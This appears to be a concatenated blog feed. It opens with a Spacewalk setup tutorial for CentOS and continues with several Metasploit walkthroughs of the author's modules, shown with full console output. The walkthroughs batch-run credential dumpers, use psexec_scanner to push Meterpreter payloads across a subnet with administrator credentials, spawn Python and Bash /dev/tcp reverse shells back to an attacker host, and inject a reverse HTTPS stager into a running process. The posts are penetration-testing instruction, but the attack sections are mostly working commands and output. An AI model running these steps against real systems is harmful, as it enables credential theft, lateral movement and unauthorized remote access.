Shell is only the Beginning

SpaceWalk is the upstream open source project for the Red Hat Satellite Server for system management. The project is licensed under the GPLv2. The main function of the project is software content management for Red Hat derived distributions such as Fedora, CentOS, and Scientific Linux in your environment. Debian and Solaris support are in experimental mode at the moment. It also allows us to kickstart systems, as well as manage and deploy configuration files. Spacewalk's monitoring feature allow us to view monitoring status for your systems alongside their software update status. Spacewalk also has virtualization capabilities to enable us to provision, control, manage, and monitor virtual Xen guests.It also provides a proxy server for synching files to geographically distributed sites from a central location. This blog post will cover the basic setup of the server and the software channels to start managing software updates in a CentOS environment.

Configuring the Environment for Installing Spacewalk

Test that name resolution is working properly.

ping -c 3 `hostname`

The pings should be successful.

Install the spacewalk repository so it will be available when using yum for installing packages:

rpm -Uvh http://spacewalk.redhat.com/yum/1.5/RHEL/6/x86_64/spacewalk-repo-1.5-1.el6.noarch.rpm

Set the jpackage repository, specifically for version 5.0

cat > /etc/yum.repos.d/jpackage-generic.repo << EOF
[jpackage-generic]
name=JPackage generic
#baseurl=http://mirrors.dotsrc.org/pub/jpackage/5.0/generic/free/
mirrorlist=http://www.jpackage.org/mirrorlist.php?dist=generic&type=free&release=5.0
enabled=1
gpgcheck=1
gpgkey=http://www.jpackage.org/jpackage.asc
EOF

For CentOS 6 there is a specific version of selinux that is needed so the CR(Continous Release) Repository must be used

cat > /etc/yum.repos.d/cr.repo << EOF
[CR-repository]
name=CR Repository
baseurl=http://mirror.centos.org/centos/\$releasever/cr/\$basearch/
enabled=1
gpgcheck=1
EOF

Spacewalk requires a Java Virtual Machine with version 1.6.0 or greater. The EPEL Repository contains a version of the openjdk that works with Spacewalk. Other dependencies can get installed from EPEL as well. To get packages from EPEL just install this RPM:

rpm -Uvh http://download.fedora.redhat.com/pub/epel/6/i386/epel-release-6-5.noarch.rpm

At the time of this writing there is a bug with cobbler-web being installed in a Spacewalk server so to make sure it does not get installed it is set as an excluded package in the yum.conf file:

echo "exclude=cobbler-web" >> /etc/yum.conf

Installing Spacewalk

The version of Spacewalk we will be installing is the PostgreSQL version. For this we will need to install PostgreSQL Server and configure it.

Installing and Configuring PostgreSQL

We will use yum to install the database server:

yum install postgresql-server

Initialize the system master database:

service postgresql initdb

Start the service so we can connect to the server and configure it:

service postgresql start

Ensure that PostgresSQL server will start with the server when it is rebooted:

 chkconfig postgresql on

Create database, user, and plpgsql language there (Change the password variable to a secure one):

su - postgres -c 'PGPASSWORD=spacepw; createdb spaceschema ; createlang plpgsql spaceschema ; yes $PGPASSWORD | createuser -P -sDR spaceuser'

We configure the user to use md5 password to connect to that database. Put the lines like following to /var/lib/pgsql/data/pg_hba.conf before the all statements

local spaceschema spaceuser md5
host  spaceschema spaceuser 127.0.0.1/8 md5
host  spaceschema spaceuser ::1/128 md5

Then we reload PostgreSQL:

service postgresql reload

Configuring Firewall

We must configure the system firewall to allow connection to the necessary ports used by the different services used by Spacewalk.

• Port 80 and 443 for connection to Web Interface and client connections to the server.
• port 4545 for Spacewalk monitoring
• Port 5222 for push actions to client machines.
• Port 5269 for push actions to a Spacewalk Proxy.
• Port 69 UDP for TFTP if provisioning will be used.

The commands to configure the firewall are:

iptables -D INPUT -j REJECT --reject-with icmp-host-prohibited
iptables -A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 4545 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 5222 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 5269 -j ACCEPT
iptables -A INPUT -p tcp -m udp --dport 69 -j ACCEPT
iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited
service iptables save
service iptables restart

Installing the Spacewalk Package

Once all dependencies have been configured we can install the spacewalk package issuing the yum command to install the PostgreSQL version, during installation we will have to accept several GPG keys for the repositories that where configured to meet the dependencies:

yum -y install spacewalk-postgresql

Initial Spacewalk Configuration

The best way to configure spacewalk is thru the use of a configuration file. The following is an example that can be modified for initial configuration (Make the necessary changes for your environment):

admin-email = root@localhost
ssl-set-org = Spacewalk Org
ssl-set-org-unit = spacewalk
ssl-set-city = My City
ssl-set-state = My State
ssl-set-country = US
ssl-password = spacewalk
ssl-set-email = root@localhost
ssl-config-sslvhost = Y
db-backend=postgresql
db-name=spaceschema
db-user=spaceuser
db-password=spacepw
db-host=localhost
db-port=5432
enable-tftp=Y

Connect to the server to create the administrator account for the default organization.

Use Firefox, for some reason Internet Explorer and Google Chrome have problems when login in to the server with the created administrator account for the first time.

After we have created this account, the server is ready to be used for administering hosts.

Setting Software Channels

Once the first organization is created one can decide on a model of a centralized or decentralized organization. Red Hat has a great white paper for this RHN SATELLITE: BEST PRACTICES FOR MULTIPLE ORGANIZATIONS

The first step is to set a Base channel this channel will contain all base packages for a system. The first Base Channel that we will set will be the one for CentOS 6.0 the version of CentOS used for the Spacewalk Server. Follow this steps one logged in:

1. Click on Channels
2. Click on Manage Software Channels
3. Click on Manage Repositories
4. Click on Create New Repository

GPG Key import

Before we start one thing to alway keep in mind is that the Spacewalk Server will not deploy packages from any repository for which it does not have the GPG Public key used to sign the packages. These keys are placed in the root of the version of the repository that one will use. First we need to download these keys import them so as to get the key ID and Fingerprint for when setting the channel and they should also be imported using rpm on the Spacewalk server. For the base CentOS repository we download the keys to import them with GPG to get the key information:

mkdir repo_keys
cd repo_keys
curl -O http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6

Now that we have the key imported we can use the ID shown in the output to list the key fingerprint to add to the channel definition, also it is advised that we do an import from rpm. Create one channel per set of repositories so it is easier to manage the key:

gpg --list-keys --fingerprint C105B9DE
rpm --import http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6

We will follow these steps for the creation of all repositories for which we will crate a channel of.

Creating Repositories

We will create 2 Repositories for CentOS 6 the first one will be the base repository for CentOS the second will be the Updates. For the base system repository enter:

• Repository Labe - CentOS6-i386-Base
• Repository URL - http://mirror.facebook.net/centos/6/os/i386/
• Then click on Create Repository

For the updates repository enter:

• Repository Labe - CentOS6-i386-Updates
• Repository URL - http://mirror.facebook.net/centos/6/updates/i386/
• Then click on Create Repository

For the Spacewalk Client repository enter:

• Repository Labe - spacewalk-client-rhel6-i386
• Repository URL - http://spacewalk.redhat.com/yum/1.5/RHEL/6/i386/
• Then click on Create Repository

Lets create a repository for VMWare Tools for vSphere 5 if you are using VMWare for running Virtual Machines:

• Repository Labe - VMware-Tools-ESX-5.0-RHL6
• Repository URL - http://packages.vmware.com/tools/esx/5.0/rhel6/i386/index.html
• Then click on Create Repository

Creating Channels

We will create a new channel that will use both Repositories:

1. Click on Channels
2. Click on Manage Software Channels
3. Click on Create New Channel

Enter the Following Parameters:

• Channel Name - CentOS 6 32-bit
• Channel Label - centos6-i386
• Parent Channel - none
• Parent Channel Architecture - IA-33
• Yum Repository Checksum Type - sha256
• Channel Summary - 32-bit CentOS 6 channel
• Under Channel Access Control Select:
  • All users within your organization may subscribe to this channel.
  • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
• GPG key URL - http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6
• GPG key ID - C105B9DE
• GPG key Fingerprint - C1DA C52D 1664 E8A4 386D BA43 0946 FCA2 C105 B9DE
• Click on Create Channel

Assign the Repositories to the Channel:

• Click on Channels
• Click on Manage Software Channels
• Click on the name of the channel that was just created
• Click on Repositories
• Select the Repositories to be linked to the channel (CentOS6-i386-Base and CentOS6-i386-Updates)
• Click on Update Repositories

To Sync the repositories

• Click on Repositories under in the channel settings
• Click on Sync
• Click on Sync Now to start the synching process
• Select a scheduling option and interval and click on Schedule

The initial sync can take hours depending on the size of the repository and internet connection speed. Packages will begin to appear slowly on the channel package list as they are downloaded and synched.

Repeat the steps for the Spacewalk Client and the VMware Tools using the settings shown bellow.

SpaceWalk Client:

• Channel Name - Spacewalk Client 32bit RHL6
• Channel Label - spacewalk-client-32bit-rhl6
• Parent Channel - CentOS 6 32-bit
• Parent Channel Architecture - IA-33
• Yum Repository Checksum Type - sha1
• Channel Summary - Spacewalk Client 32bit for RHL6
• Under Channel Access Control Select:
  • All users within your organization may subscribe to this channel.
  • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
• GPG key URL - http://spacewalk.redhat.com/yum/RPM-GPG-KEY-spacewalk
• GPG key ID - 430A1C35
• GPG key Fingerprint - B6F4 CBE4 8B8F 45E1 85F8 34B2 9542 3D4E 430A 1C35

Assign the repository spacewalk-client-rhel6-i386 to the channel and set a sync schedule

VMWare Tools:

• Channel Name - VMware Tools RHL6 32bit ESX5
• Channel Label - rhl6-vm-32bit-esx5
• Parent Channel - CentOS 6 32-bit
• Parent Channel Architecture - IA-33
• Yum Repository Checksum Type - sha1
• Channel Summary - VMware Tools RHL6 32bit ESX5
• Under Channel Access Control Select:
  • All users within your organization may subscribe to this channel.
  • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
• GPG key URL - http://packages.vmware.com/tools/VMWARE-PACKAGING-GPG-KEY.pub
• GPG key ID - 66FD4949
• GPG key Fingerprint - 36E4 7E1C C4DC C5E8 152D 115C C0B5 E0AB 66FD 4949

Assign the repository Vmware-Tools-ESX-5.0-RHL6 to the channel and set a sync schedule

For more information on creating repos and synching them do take a look at: Uploading Content

Enable the OSA Dispatcher so we can push jobs imediatly to registered systems:

chkconfig osa-dispatcher on
service osa-dispatcher start

Connecting a CentOS 6 System

Before connecting to a CentOS 6 System you need to create an activation key to use for registering the systems and assign a software channel to it. To create an Activation Key we do the following:

• Click on Systems
• Click on Activation Keys
• Click on Create New Key
• Enter the Following Information
  • Description - CentOS 6 i386 Systems
  • key - centos6-32bit
  • Base Channels - *CentOS 6 32-bit *
  • Add-On Entitlements - Select Monitoring and Provisioning (You can also choose the Virtualization Entitlements if you wish to use them)
• Click on Create Activation Key

The key is now ready to use.

To connect the system the appropriate client software must be installed on the system

We start by installing the appropriate repository for the spacewalk client software:

rpm -Uvh http://spacewalk.redhat.com/yum/1.5/RHEL/6/i386/spacewalk-client-repo-1.5-1.el6.noarch.rpm
rpm -Uvh http://download.fedora.redhat.com/pub/epel/6/i386/epel-release-6-5.noarch.rpm

Install the necessary client software:

yum install rhn-client-tools rhn-check rhn-setup rhnsd m2crypto yum-rhn-plugin osad

We can register the CentOS system to Spacewalk using the activation key we created earlier:

rhnreg_ks --serverUrl=http://YourSpacewalk.example.org/XMLRPC --activationkey=1-centos6-32bit

We need to configure OSAD so we can push actions to this system, we start by downloading the certificate and setting the certificate in the configuration file for OSAD:

cd /usr/share/rhn/
curl -O http://yourspacewalk.example.org/pub/RHN-ORG-TRUSTED-SSL-CERT
/usr/bin/perl -p -i -e "s/osa_ssl_cert =/osa_ssl_cert = \/usr\/share\/rhn\/RHN-ORG-TRUSTED-SSL-CERT/g" /etc/sysconfig/rhn/osad.conf

We can now set the service:

chkconfig osad on
service osad start

For information on connecting other systems do take a loot at Registering Clients

Caveats

At the moment of this writing in version 1.5 of Spacewalk Errata is only imported from Fedora Channels and not all errata is process. CentOS has not distributed any errata for the version 6.x of CentOS so automating the import of errata is not possible. For previous versions of CentOS the following blog post Blog shows a way to automate the import of the errata information.

A Module I wrote to simplify the running of multiple post modules against a session for users that did not want to learn how to code ruby or wanted to learn the API to build a resource file to achieve this could use something simpler for them to achieve this task. The module is called multi_post. Lets load the module and see the options it has:

msf > use post/multi/manage/multi_post 
msf  post(multi_post) > info

       Name: Multi Manage Post Module Macro Execution
     Module: post/multi/manage/multi_post
    Version: 14287
   Platform: Windows, Unix, OSX, Linux, Solaris
       Arch: 
       Rank: Normal

Provided by:
  carlos_perez <carlos_perez@darkoperator.com>

Description:
  This module will execute a list of modules given in a macro file in 
  the format of < module > < opt=val,opt=val > against the select session 
  checking for compatibility of the module against the sessions and 
  validation of the options provided.


msf  post(multi_post) > show options 

Module options (post/multi/manage/multi_post):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   MACRO                     yes       File with Post Modules and Options to run in the session
   SESSION                   yes       The session to run this module on.

As we can see it takes a macro file where each post module and its options are written one per line in the format of < module > < opt=val,opt=val > lets create a macro for running all password dumping credentials. The Macro would look something like this:

post/windows/gather/credentials/wsftp_client
post/windows/gather/credentials/winscp
post/windows/gather/credentials/windows_autologin
post/windows/gather/credentials/vnc
post/windows/gather/credentials/trillian
post/windows/gather/credentials/total_commander
post/windows/gather/credentials/smartftp
post/windows/gather/credentials/outlook
post/windows/gather/credentials/nimbuzz
post/windows/gather/credentials/mremote
post/windows/gather/credentials/imail
post/windows/gather/credentials/idm
post/windows/gather/credentials/flashfxp
post/windows/gather/credentials/filezilla_server
post/windows/gather/credentials/meebo
post/windows/gather/credentials/coreftp
post/windows/gather/credentials/imvu
post/windows/gather/credentials/epo_sql
post/windows/gather/enum_ie
post/multi/gather/ssh_creds
post/multi/gather/pidgin_cred
post/multi/gather/firefox_creds
post/multi/gather/filezilla_client_cred

Now we save the file as cred_dump.rc and so we can use it in the module:

msf  post(multi_post) > set MACRO /Users/carlos/cred_dump.rc
MACRO => /Users/carlos/cred_dump.rc
msf  post(multi_post) > set SESSION 1
SESSION => 1
msf  post(multi_post) > run

[*] Running module against WIN2K8R2-01
Loading post/windows/gather/credentials/wsftp_client
Running Against 1
[*] Checking Default Locations...
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....
Loading post/windows/gather/credentials/winscp
Running Against 1
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!
Loading post/windows/gather/credentials/windows_autologin
Running Against 1
[*] Running against WIN2K8R2-01 on session 1
[-] Post failed: NameError undefined local variable or method `d02' for #<#<Module:0x007fc88b0c0e78>::Metasploit3:0x007fc88fd80898>
[-] Call stack:
[-]   /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/windows_autologin.rb:95:in `run'
Loading post/windows/gather/credentials/vnc
Running Against 1
[*] Enumerating VNC passwords on WIN2K8R2-01
[*] Checking UltraVNC...
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[*] Checking TightVNC_HKLM_Control_pass...
[*] Checking RealVNC_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC4_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500...

. . . . . .

[*] Checking for Firefox directory in: C:\Users\Administrator\AppData\Roaming\Mozilla\
[-] Firefox not found
Loading post/multi/gather/filezilla_client_cred
Running Against 1
[*] Checking for Filezilla directory in: C:\Users\Administrator\AppData\Roaming
[*] No users found with a FileZilla directory
[*] Post module execution completed
msf  post(multi_post) >

As we can see this can be helpful if one wants to create quick macro files to run collections of post modules and use them in automated fashion like with AutoRunScript for when running exploits or setting a multi handler.

As always I hope you find this information useful.

Some time ago I was talking with Martin Bos also know as @pure_hate one of the members of the Backtrack Development team and a Pentester and he mentioned that he would love to have a better way of using the psexec module that is already part on the framework in an easier way than using resource scripts which he had to modify and play with for each engagement. So I took it upon myself to help him out an write an auxiliary scanner module for him to use in egagements, at the same time Larry Pesce from Pauldotcom came to me with a similar requirement for when he is doing pentests against client environments and wanted to re-use the credentials he gathered inside the framework that are stored in the database so I came with the following requirements:

• The module must Scan a range for port 445 TCP and only on those with the port open perform the attack.
• have the ability to set the normal variables of the payload like LHOST and LPORT.
• Provide the ability to specify additional options for the payload, specially for those that have extra advanced options like the Meterpreter HTTPS payload.
• Accept the standard options for the psexec module.

The module i wrote can be found in my GitHub page at psexec_scanner. To use the module you need to do:

mkdir -p ~/.msf4/modules/auxiliary/scanner/smb/
cd ~/.msf4/modules/auxiliary/scanner/smb/
curl -O https://raw.github.com/darkoperator/Meterpreter-Scripts/master/auxiliary/scanner/smb/psexec_scanner.rb

Now we can use the module with any instance of the framework we load in the system making it easier to use across forks of the repository.

Now when we are inside msfconsole we can load the module and look at the options it provides:

msf > use auxiliary/scanner/smb/psexec_scanner 
msf  auxiliary(psexec_scanner) > show options 

Module options (auxiliary/scanner/smb/psexec_scanner):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   HANDLER    true                             no        Start an Exploit Multi Handler to receive the connection
   LHOST                                       yes       Local Hosts for payload to connect.
   LPORT                                       yes       Local Port for payload to connect.
   OPTIONS                                     no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD    windows/meterpreter/reverse_tcp  yes       Payload to use against Windows host
   RHOSTS                                      yes       Range of hosts to scan.
   SHARE      ADMIN$                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                        yes       SMB Domain
   SMBPass                                     no        SMB Password
   SMBUser                                     no        SMB Username
   THREADS    1                                yes       The number of concurrent threads
   TYPE       manual                           no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)

As we can see it takes 2 options when it comes to credentials one where we set one single credential to test against several systems or use the credentials found in the database for the current workspace. The credentials in the database will use those stored there in plain text or smb hash format so it will used those found via dumping hashes from target systems and those found thru bruteforcing like the smblogin modules. I did not add the bruteforcing part using a list of user and passwords since the smblogin module is much better suited for this task. Having the module use the options this ways makes it perfect for levering a initial compromise to some systems and expand it to a wider range.

Lets do a sample run against some target systems using a set of credentials I was able to obtain by other means and run it against a range. We start by setting the appropriate options for the payload, set a range to scan, credentials and the number of threads to use:

msf  auxiliary(psexec_scanner) > set LHOST  172.16.163.1
LHOST => 172.16.163.1
msf  auxiliary(psexec_scanner) > set LPORT 4444
LPORT => 4444
msf  auxiliary(psexec_scanner) > set RHOSTS  172.16.163.2-150
RHOSTS => 172.16.163.2-150
msf  auxiliary(psexec_scanner) > set SMBUser Administrator
SMBUser => Administrator
msf  auxiliary(psexec_scanner) > set SMBPass Newsystem01
SMBPass => Newsystem01
msf  auxiliary(psexec_scanner) > set THREADS 10
THREADS => 10

Once we have all set we can launch the scan against the range:

msf  auxiliary(psexec_scanner) > run

[*] Using the username and password provided
#<#<Class:0x007fc88d91aef8>:0x007fc88c53c690>
[*] Starting exploit multi handler
[*] Started reverse handler on 172.16.163.1:4444 
[*] Starting the payload handler...
[*] Scanned 019 of 149 hosts (012% complete)
[*] Scanned 030 of 149 hosts (020% complete)
[*] Scanned 045 of 149 hosts (030% complete)
[*] Scanned 060 of 149 hosts (040% complete)
[*] Scanned 075 of 149 hosts (050% complete)
[*] Scanned 090 of 149 hosts (060% complete)
[*] Scanned 105 of 149 hosts (070% complete)
[*] Scanned 120 of 149 hosts (080% complete)
[*] 172.16.163.141:445 - TCP OPEN
[*] Trying Administrator:Newsystem01
[*] Connecting to the server...
[*] Authenticating to 172.16.163.141:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Scanned 136 of 149 hosts (091% complete)
[*] Created \tMxFrkje.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.163.141[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.163.141[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PKTFMpHK - "MHLGojYuKIPncRpRNJynImVk")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \tMxFrkje.exe...
[*] Sending stage (752128 bytes) to 172.16.163.141
[*] Meterpreter session 1 opened (172.16.163.1:4444 -> 172.16.163.141:49159) at 2011-12-15 20:23:52 -0400
[*] Scanned 149 of 149 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(psexec_scanner) > sessions -l

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2K8R2-01  172.16.163.1:4444 -> 172.16.163.141:49159

msf  auxiliary(psexec_scanner) >

A great way to keep leveraging would be to set in the options smart_hashdump and the credential modules as a macro to run against a session in the AutoRunScript option.

Hope you find this blog post useful as always.

After writing the payload inject module for Windows I was looking thru my Twitter feed and saw a tweet from Chris John Riley on the PentestMonkey website where he has a cheat sheet that shows how to use a targets scripting environment to create a reverse shell in one line executing with the code as an argument so that nothing is actually written to disk and the session resides in memory. After seeing this I thought it would be a great idea to have a s a module for Unix type systems (Linux, BSD,HPUX, Solaris, OS X..etc) So I wrote a module that is part of the framework that is called system_session. The module will look for the following scripting environments to us to create a reverse shell:

• Perl
• Python
• Ruby
• Bash

It will look in this same order for the presence of the interpreter and use it for creating the reverse shell.

For showing how the module works we will use some sessions to systems in my lab where session 1 is for a FreeBSD 8.2 VM, session 3 and session 4 is for a Linux Ubuntu System.

sessions 

Active sessions
===============

  Id  Type                   Information                               Connection
  --  ----                   -----------                               ----------
  1   shell bsd              SSH admin:Newsystem01 (192.168.1.134:22)  192.168.1.241:55187 -> 192.168.1.134:22
  2   meterpreter x86/win32  VICTIMLAB\administrator @ WIN701          192.168.1.100:4444 -> 192.168.1.138:23021
  3   meterpreter x86/win32  VICTIMLAB\Administrator @ WIN2K3LAB01     192.168.1.100:4444 -> 192.168.1.138:4340
  4   shell linux                                                      192.168.1.100:4448 -> 192.168.1.135:37211

Lets start by selecting the module and looking at the options

msf  auxiliary(ssh_login) > use post/multi/manage/system_session 
msf  post(system_session) > show options 

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

Lets start with the case of letting the module select the first supported scripting environment and set a remote session

msf  post(system_session) > set SESSION 1
SESSION => 1
msf  post(system_session) > set LHOST 192.168.1.100
LHOST => 192.168.1.100

msf  post(system_session) > set HANDLER true
HANDLER => true
msf  post(system_session) > run

[*] Starting exploit multi handler
[*] Started reverse handler on 192.168.1.100:4433 
[*] Starting the payload handler...
[*] Python was found on target
[*] Python reverse shell selected
[*] Executing reverse tcp shel to 192.168.1.100 on port 4433
[*] Post module execution completed
msf  post(system_session) > [*] Command shell session 5 opened (192.168.1.100:4433 -> 192.168.1.134:60732) at 2011-10-28 15:03:39 -0400

msf  post(system_session) > sessions 

Active sessions
===============

  Id  Type                   Information                               Connection
  --  ----                   -----------                               ----------
  1   shell bsd              SSH admin:Newsystem01 (192.168.1.134:22)  192.168.1.241:55187 -> 192.168.1.134:22
  2   meterpreter x86/win32  VICTIMLAB\administrator @ WIN701          192.168.1.100:4444 -> 192.168.1.138:23021
  3   meterpreter x86/win32  VICTIMLAB\Administrator @ WIN2K3LAB01     192.168.1.100:4444 -> 192.168.1.138:4340
  4   shell linux                                                      192.168.1.100:4448 -> 192.168.1.135:37211
  5   shell bsd                                                        192.168.1.100:4433 -> 192.168.1.134:60732

msf  post(system_session) >

Now lets try just using the Bash reverse TCP shell using /dev/tcp on one of the Linux systems:

msf  post(system_session) > set SESSION 4
SESSION => 4
msf  post(system_session) > set TYPE bash 
TYPE => bash
msf  post(system_session) > run

[*] Starting exploit multi handler
[-] Job 5 is listening on IP 192.168.1.100 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Bash reverse shell selected
[*] Executing reverse tcp shel to 192.168.1.100 on port 4433
[*] Post module execution completed
msf  post(system_session) > [*] Command shell session 6 opened (192.168.1.100:4433 -> 192.168.1.135:45662) at 2011-10-28 15:08:13 -0400

msf  post(system_session) > sessions -i 6
[*] Starting interaction with 6...

bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

carlos@infidel02-dev:/home/carlos/Desktop$ uname -a
uname -a
Linux infidel02-dev 2.6.32-25-generic #45-Ubuntu SMP Sat Oct 16 19:48:22 UTC 2010 i686 GNU/Linux
carlos@infidel02-dev:/home/carlos/Desktop$ ^Z
Background session 6? [y/N]  y

As we can see this can become quite useful when the shell we have is one on a Unix type system where the framework still does not support injecting in to processes payloads and where writing a file to disk is not necessarily the best option in that case.

As alway I hope you find this information useful.

Recently at Derbycon 2010 I had a chance to see Egyp7 (James Lee) from the metasploit project do some demos for students of his Metasploit class and I saw he was using the multimeterinject script I wrote to create a secondary shell in case the main one died. I also saw that on 64bit systems it was a pain because it just failed silently, did not gave any warning. On my flight back from the conference I thought that injecting not only a Meterpreter payload could be quite useful, specially when one wishes to have a GUI access on the box but enabling RDP would be to risky one could inject a VNC payload, so I wrote a post module called payload_inject. The module has the capability of:

• Injecting a Windows Payload in to 32bit and 64bit Processes.
• Check that both the payload and the process are of the same architecture.
• Start a temporary process with the appropriate architecture.
• Be able to provide a flexible option list since different payloads have different options.

So payload_inject was born in a flight from Kentucky to Puerto Rico.

Lets start by looking at the module and it's options from inside a Meterpreter session:

msf  post(persistence) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > info post/windows/manage/payload_inject 

       Name: Windows Manage Memory Payload Injection Module
     Module: post/windows/manage/payload_inject
    Version: 14039
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>

Description:
  This module will inject into the memory of a process a specified 
  windows payload. If a payload or process is not provided one will be 
  created by default using a reverse x86 TCP Meterpreter Payload.




Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST                                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.   
   SESSION                                   yes       The session to run this module on.

Now that we see that are the options available lets load a reverse HTTPS session in a persistent way in memory as our secondary shell:

meterpreter > run post/windows/manage/payload_inject PAYLOAD=windows/meterpreter/reverse_https,LHOST=192.168.1.100,LPORT=3334,HANDLER=true,OPTIONS='SessionCommunicationTimeout=0,SessionExpirationTimeout=0,PID=3384'

[*] Running module against WIN701
[*] Starting exploit multi handler
[*] Performing Architecture Check
[*] Started HTTPS reverse handler on https://192.168.1.100:3334/
[*] Starting the payload handler...
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 3384
[*] Opening process 3384
[*] Generating payload
[*] Allocating memory in process 3384
[*] Allocated memory at address 0x006e0000, for 369 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 3384
meterpreter > 
[*] 192.168.1.138:37854 Request received for /INITM...
[*] 192.168.1.138:37854 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 7 opened (192.168.1.100:3334 -> 192.168.1.138:37854) at 2011-10-28 17:47:46 -0400

One of the things I like about the HTTPS sessions is that I can detach from one and reconnect later to it by just bringing up a listener:

meterpreter > background 
msf  post(persistence) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > detach 

[*] Meterpreter session 7 closed.  Reason: User exit
msf  post(persistence) > 
[*] 192.168.1.138:48859 Request received for /CONN_bPXZiVo1IOWy8xFv/...
[*] Incoming orphaned session CONN_bPXZiVo1IOWy8xFv, reattaching...
[*] Meterpreter session 7 opened (192.168.1.100:3334 -> 192.168.1.138:48859) at 2011-10-28 17:55:12 -0400

We can do the same with any Windows compatible payload. I hope you find the module useful.